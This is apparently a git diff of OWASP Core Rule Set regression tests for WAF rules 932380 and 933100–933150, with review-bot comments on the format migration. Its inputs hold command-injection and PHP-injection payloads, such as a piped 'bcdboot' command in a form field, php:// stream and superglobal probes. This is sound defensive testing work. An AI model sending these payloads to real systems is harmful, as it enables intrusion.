127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/www/delivery/lg.php?bannerid=18&campaignid=1&zoneid=4&loc=https%3A%2F%2Fwww.example.com%2Ffoo%2Fbar%2Fx-x%2Fx%3Fs%3D2014-11-01%26e%3D2020-10-31%26ex%3D7%26page%3D1%26sort%3Dex%26sort%3Ddescending&referer=https%3A%2F%2Fwww.example.com%2Ffoo%2Fbar%2Fx-x%2Fx%3Fs%3D2014-11-01%26e%3D2020-10-31%26ex%3D7%26page%3D1%26sort%3Dex%26sort%3Dascending&cb=7de91ea349" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932380] + - test_id: 6 desc: | Windows shell command injection with 'sort' (false positive): sort%3D0 Do not match encoded path stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP 
CRS test agent" - method: GET - port: 80 - uri: "/get/url%2Fbla%3Ftest%3D1%26sort%3D0" - version: HTTP/1.0 - output: - no_log_contains: id "932380" - - test_title: 932380-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/url%2Fbla%3Ftest%3D1%26sort%3D0" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932380] + - test_id: 7 desc: "Windows shell command injection using 'bcdboot'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=test@coreruleset.org\"|bcdboot %SYSTEMROOT%\\win.ini" - version: HTTP/1.0 - output: - log_contains: id "932380" - - test_title: 932380-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=test@coreruleset.org\"|bcdboot %SYSTEMROOT%\\win.ini" + version: HTTP/1.0 + output: + log: + expect_ids: [932380] + - test_id: 8 desc: False positive against 'time warner' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=time+warner+" - version: HTTP/1.1 - output: - no_log_contains: "id \"932380\"" - - test_title: 932380-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: 
"OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=time+warner+" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932380] + - test_id: 9 desc: False positive against 'time for' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.1 - data: | - payload=While this is a challenging time for us all, we are busy helping customers manage playout infrastructure in ways that were just dreams only a couple of years ago. - output: - no_log_contains: "id \"932380\"" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: POST + port: 80 + uri: "/post" + version: HTTP/1.1 + data: | + payload=While this is a challenging time for us all, we are busy helping customers manage playout infrastructure in ways that were just dreams only a couple of years ago. + output: + log: + no_expect_ids: [932380] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml index c586dec53..cf96b5e1f 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml 
@@ -1,151 +1,149 @@ --- meta: author: "csanders-git, Franziska Bühler, azurit" - description: None - enabled: true - name: 933100.yaml +rule_id: 933100 tests: - - test_title: 933100-1 + - test_id: 1 desc: PHP Injection Attack (933100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo= + - ------WebKitFormBoundaryoRWIb3busvBrbttO-- - version: HTTP/1.1 - output: - log_contains: id "933111" + ------WebKitFormBoundaryoRWIb3busvBrbttO-- + version: HTTP/1.1 + output: + log: + expect_ids: [933111] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml index a9661c56c..47955fc8a 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml 
@@ -1,169 +1,167 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 933120.yaml +rule_id: 933120 tests: - - test_title: 933120-1 + - test_id: 1 desc: "PHP Injection Attack: Configuration Directive" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=opcache.jit_max_polymorphic_calls%3d50" - version: HTTP/1.0 - output: - log_contains: id "933120" - - test_title: 933120-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=opcache.jit_max_polymorphic_calls%3d50" + version: HTTP/1.0 + output: + log: + expect_ids: [933120] + - test_id: 2 desc: "Test correct logging" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - port: 80 - data: "var=session.referer_check%3dtrue" - version: HTTP/1.0 - output: - no_log_contains: = found within - - test_title: 933120-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: "var=session.referer_check%3dtrue" + version: HTTP/1.0 + 
output: + log: + match_regex: 'session.referer_check found within ARGS:var:' + - test_id: 3 desc: "PHP Injection Attack: Configuration Directive: engine" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - port: 80 - data: "var=engine%3dtrue" - version: HTTP/1.0 - output: - log_contains: id "933120" - - test_title: 933120-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: "var=engine%3dtrue" + version: HTTP/1.0 + output: + log: + expect_ids: [933120] + - test_id: 4 desc: "PHP Injection Attack: Configuration Directive: extension" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - port: 80 - data: "var=extension%3dtrue" - version: HTTP/1.0 - output: - log_contains: id "933120" - - test_title: 933120-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: "var=extension%3dtrue" + version: HTTP/1.0 + output: + log: + expect_ids: [933120] + - test_id: 5 desc: "PHP Injection Attack: Configuration Directive: 
mbstring.regex_retry_limit" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - port: 80 - data: "var=mbstring.regex_retry_limit%3dtrue" - version: HTTP/1.0 - output: - log_contains: id "933120" - - test_title: 933120-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: "var=mbstring.regex_retry_limit%3dtrue" + version: HTTP/1.0 + output: + log: + expect_ids: [933120] + - test_id: 6 desc: "PHP Injection Attack: Configuration Directive: mbstring.regex_stack_limit" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - port: 80 - data: "var=mbstring.regex_stack_limit%3dtrue" - version: HTTP/1.0 - output: - log_contains: id "933120" - - test_title: 933120-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: "var=mbstring.regex_stack_limit%3dtrue" + version: HTTP/1.0 + output: + log: + expect_ids: [933120] + - test_id: 7 desc: "PHP Injection Attack: Configuration Directive: precision" stages: - - stage: - input: - dest_addr: 127.0.0.1 
- headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - port: 80 - data: "var=precision%3dtrue" - version: HTTP/1.0 - output: - log_contains: id "933120" - - test_title: 933120-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: "var=precision%3dtrue" + version: HTTP/1.0 + output: + log: + expect_ids: [933120] + - test_id: 8 desc: "PHP Injection Attack: Configuration Directive: smtp" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - port: 80 - data: "var=smtp%3dtrue" - version: HTTP/1.0 - output: - log_contains: id "933120" - - test_title: 933120-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: "var=smtp%3dtrue" + version: HTTP/1.0 + output: + log: + expect_ids: [933120] + - test_id: 9 desc: "PHP Injection Attack: Configuration Directive: unserialize_max_depth" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - port: 80 - data: "var=unserialize_max_depth%3dtrue" - version: HTTP/1.0 - output: - log_contains: id "933120" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: "var=unserialize_max_depth%3dtrue" + version: HTTP/1.0 + output: + log: + expect_ids: [933120] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml index f2d3f9436..653bbab73 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml 
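Review bot: The `match_regex` added for test 2 ("Test correct logging") leaves the `.` in `session.referer_check` unescaped, so it is a regex wildcard rather than the literal dot the directive name contains; write it as `match_regex: 'session\.referer_check found within ARGS:var:'`. The removed `no_log_contains: = found within` encoded the intent that the logged match is the bare directive name and not the whole `key=value`; that intent is now only implicit in the positive pattern, so a comment such as `# logged match must be the directive name only, not the full key=value pair` above the `log:` block, plus `expect_ids: [933120]` beside the regex if the schema accepts both, would make the test self-explanatory and also fail clearly when the rule does not fire at all. As a point of style, test 1 lists `port` before `uri` while tests 2–9 list `uri` before `port`; one order across the file would keep future diffs tidy.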
@@ -1,103 +1,101 @@ --- meta: author: "csanders-git, azurit" - description: Tests functionality of 933130 - enabled: true - name: 933130.yaml +rule_id: 933130 tests: - - test_title: 933130-1 + - test_id: 1 desc: Basic Request nothing should trigger stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "933130" - - test_title: 933130-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933130] + - test_id: 2 desc: Trigger a basic request stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=$_SERVER['test'];" - version: "HTTP/1.1" - output: - log_contains: id "933130" - - test_title: 933130-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=$_SERVER['test'];" + version: "HTTP/1.1" + output: + log: + expect_ids: [933130] + - test_id: 3 desc: Non-Server Request stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: 
"/get?x=$_SE%20RVER['test'];" - version: "HTTP/1.1" - output: - no_log_contains: id "933130" - - test_title: 933130-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=$_SE%20RVER['test'];" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933130] + - test_id: 4 desc: SERVER request URLEncoded stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=$_%53ERVER['test'];" - version: "HTTP/1.1" - output: - log_contains: id "933130" - - test_title: 933130-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=$_%53ERVER['test'];" + version: "HTTP/1.1" + output: + log: + expect_ids: [933130] + - test_id: 5 desc: SERVER request URLEncoded stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?%24_COOKIE=value;" - version: "HTTP/1.1" - output: - log_contains: id "933130" - - test_title: 933130-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?%24_COOKIE=value;" + version: "HTTP/1.1" + output: + log: + expect_ids: [933130] + - test_id: 6 desc: SERVER index 
listed with obfuscated SERVER stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=$_%53%20ERVER['request_uri'];" - version: "HTTP/1.1" - output: - no_log_contains: id "933130" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=$_%53%20ERVER['request_uri'];" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933130] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml index 6bc3f6ca6..55fbb3c87 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml 
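Review bot: Tests 4 and 5 in the migrated 933130 file carry the identical description `SERVER request URLEncoded`, yet test 5 sends `/get?%24_COOKIE=value;` and exercises the `$_COOKIE` superglobal with an encoded dollar sign, not `$_SERVER`; a distinct line such as `desc: COOKIE superglobal with URL-encoded dollar sign` would let a failing `test_id` be understood without opening the file. The same duplicated description appears for tests 1 and 2 of 933131 in the next hunk, where test 2 likewise uses `%24_COOKIE`, and should be fixed there as well.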
@@ -1,55 +1,53 @@ --- meta: author: "csanders-git, azurit" - description: Tests functionality of stricter sibling 933131 - enabled: true - name: 933131.yaml +rule_id: 933131 tests: - - test_title: 933131-1 + - test_id: 1 desc: SERVER request URLEncoded stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=$_%53ERVER['test'];" - version: "HTTP/1.1" - output: - no_log_contains: id "933131" - - test_title: 933131-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=$_%53ERVER['test'];" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933131] + - test_id: 2 desc: SERVER request URLEncoded stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?%24_COOKIE=value;" - version: "HTTP/1.1" - output: - no_log_contains: id "933131" - - test_title: 933131-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?%24_COOKIE=value;" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933131] + - test_id: 3 desc: SERVER index listed with obfuscated SERVER stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=$_%53%20ERVER['REQUEST_URI'];" - version: "HTTP/1.1" - output: - log_contains: id "933131" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=$_%53%20ERVER['REQUEST_URI'];" + version: "HTTP/1.1" + output: + log: + expect_ids: [933131] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml index 9db6f3c0d..7d50b91e3 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml @@ -1,25 +1,23 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 933140.yaml +rule_id: 933140 tests: - - test_title: 933140-1 + - test_id: 1 desc: "PHP Injection Attack: I/O Stream" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=php://stdout" - version: HTTP/1.0 - output: - log_contains: id "933140" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=php://stdout" + version: HTTP/1.0 + output: + log: + expect_ids: [933140] 
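Review bot: In test_id 2 of 933131.yaml the `desc: SERVER request URLEncoded` is copied from test 1, but its payload is `%24_COOKIE=value;`, so the description no longer says what this negative case checks; `desc: COOKIE superglobal URLEncoded, no match expected` would make the intent readable in the runner output. The old `meta.description: Tests functionality of stricter sibling 933131` was dropped with the format change and nothing in the new header explains why this file mirrors 933130's cases with flipped expectations (compare test 3 here with 933130's test 6); if the new schema has no description field, a YAML comment `# Stricter sibling of 933130; see 933130.yaml for the paired cases` under `rule_id` keeps that context.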
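Review bot: The single test in 933140.yaml writes `Host: "localhost"` and `version: HTTP/1.0`, the opposite quoting from the sibling files in this change (933131 and 933150 write `Host: localhost` and `version: "HTTP/1.1"`); both forms parse to the same plain strings, so this is style only, but `Host: localhost` and `version: "HTTP/1.0"` would match the rest of the directory. Among the files in this chunk it is also the only case sent as HTTP/1.0 with a POST body; a short desc note such as `desc: "PHP Injection Attack: I/O Stream (HTTP/1.0 POST)"` would tell the next reader that the protocol version is deliberate.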
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml index b72c81fc4..c05319b5f 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml 
@@ -1,573 +1,570 @@ --- meta: author: "lifeforms, azurit" - description: None - enabled: true - name: 933150.yaml +rule_id: 933150 tests: - - test_title: 933150-1 + - test_id: 1 desc: phpinfo stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/phpinfo" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/phpinfo" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 2 desc: base64_decode stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/base64_decode" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/base64_decode" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 3 desc: base64_decode mixed case stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?base64_deCOde" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 
933150-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?base64_deCOde" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 4 desc: bzdecompress stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=bzdecomprEss" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=bzdecomprEss" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + 